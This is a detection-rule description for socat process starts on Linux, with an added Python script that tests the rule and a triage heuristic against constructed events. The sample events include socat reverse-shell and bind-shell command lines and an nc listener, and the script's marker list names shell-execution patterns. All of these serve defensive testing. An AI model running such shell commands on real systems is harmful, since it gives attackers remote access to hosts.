
Summary
This detection rule identifies execution of the socat process on Linux hosts. Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. It has legitimate uses (port forwarding, proxying, testing services) but is also a common attacker tool for setting up reverse shells or opening listening ports, either of which can indicate unauthorized access or lateral movement across network segments. Because it is dual-use, and because scripts and automated tools may invoke it routinely, distinguishing benign from malicious use is difficult. The rule matches events of type "start" or "process_started" whose process name is socat, and excludes invocations carrying the -V argument, which only print the version and exit. Expect false positives from legitimate use in server setups and scripts, in particular where socat is spawned by a web server; such hits warrant contextual investigation (parent process, command-line arguments, remote endpoints) to establish the intent behind the execution.
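The rule logic described above, run over a handful of constructed process events, as an added example that is not part of the original rule or its source repository. Field names follow the ECS convention (event.type, process.name, process.args, process.parent.name); the events, the event identifiers and the triage_hints helper are assumptions added for illustration. The triage heuristic goes slightly beyond the rule itself: it tags matched events whose arguments contain a listener address, an EXEC:/SYSTEM: target or a shell path, since those are the reverse-shell and listening-port patterns the summary calls out, which helps an analyst prioritise the inevitable false positives.

```python
# Added example: the socat rule's match logic plus a triage heuristic,
# exercised against constructed sample events (not real telemetry).

# Argument fragments that suggest a listener or command execution.
# Added heuristic for prioritisation; it is not part of the rule.
SUSPICIOUS_MARKERS = ("EXEC:", "SYSTEM:", "LISTEN:", "/bin/sh", "/bin/bash")


def matches_rule(event: dict) -> bool:
    """True when the event satisfies the rule: a process start event whose
    process name is 'socat' and whose arguments do not include '-V'."""
    if event.get("event.type") not in ("start", "process_started"):
        return False
    if event.get("process.name") != "socat":
        return False
    # '-V' only prints the version and exits, so it is excluded as benign.
    return "-V" not in event.get("process.args", [])


def triage_hints(event: dict) -> list:
    """Return the sorted set of suspicious markers found in the arguments.
    An empty list means the hit still needs context (parent, endpoints),
    but nothing in the command line itself points at shell access."""
    hits = set()
    for arg in event.get("process.args", []):
        for marker in SUSPICIOUS_MARKERS:
            if marker in arg:
                hits.add(marker)
    return sorted(hits)


def run(events: list) -> list:
    """Apply the rule and attach triage hints to every match."""
    return [(e["id"], triage_hints(e)) for e in events if matches_rule(e)]


# Constructed sample events; the IDs and parent names are illustrative.
SAMPLE_EVENTS = [
    {   # reverse shell: connect out and hand the peer a shell on a pty
        "id": "ev1", "event.type": "start", "process.name": "socat",
        "process.parent.name": "bash",
        "process.args": ["socat", "TCP:10.0.0.5:4444",
                         "EXEC:/bin/bash,pty,stderr,setsid,sigint,sane"],
    },
    {   # bind shell: listen and spawn /bin/sh for every connection
        "id": "ev2", "event.type": "process_started", "process.name": "socat",
        "process.parent.name": "sh",
        "process.args": ["socat", "TCP-LISTEN:4444,reuseaddr,fork", "EXEC:/bin/sh"],
    },
    {   # version check: excluded by the rule
        "id": "ev3", "event.type": "start", "process.name": "socat",
        "process.parent.name": "bash",
        "process.args": ["socat", "-V"],
    },
    {   # port forward spawned by a web server: matches, likely benign,
        # and the kind of hit the summary flags as a false positive
        "id": "ev4", "event.type": "start", "process.name": "socat",
        "process.parent.name": "nginx",
        "process.args": ["socat", "TCP-LISTEN:8080,fork", "TCP:127.0.0.1:80"],
    },
    {   # process exit event: wrong event type, not matched
        "id": "ev5", "event.type": "end", "process.name": "socat",
        "process.parent.name": "bash",
        "process.args": ["socat", "TCP-LISTEN:4444", "EXEC:/bin/sh"],
    },
    {   # different tool with similar arguments: rule is socat-specific
        "id": "ev6", "event.type": "start", "process.name": "nc",
        "process.parent.name": "bash",
        "process.args": ["nc", "-lvp", "4444"],
    },
]


if __name__ == "__main__":
    for event_id, hints in run(SAMPLE_EVENTS):
        print(event_id, hints or "(no shell/listener markers; check context)")
```

ev1, ev2 and ev4 fire; ev3 is dropped by the -V exclusion, ev5 by the event type and ev6 by the process name. ev4 is the case the summary warns about: it matches the rule and even carries a listener marker, but the parent process (a web server) and the loopback target suggest a port forward rather than an intrusion, which is why parent and endpoint context belongs in the investigation rather than in the rule.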
Categories
- Linux
- Endpoint
- Infrastructure
Data Sources
- Process
- Logon Session
- Network Traffic
Created: 2020-02-18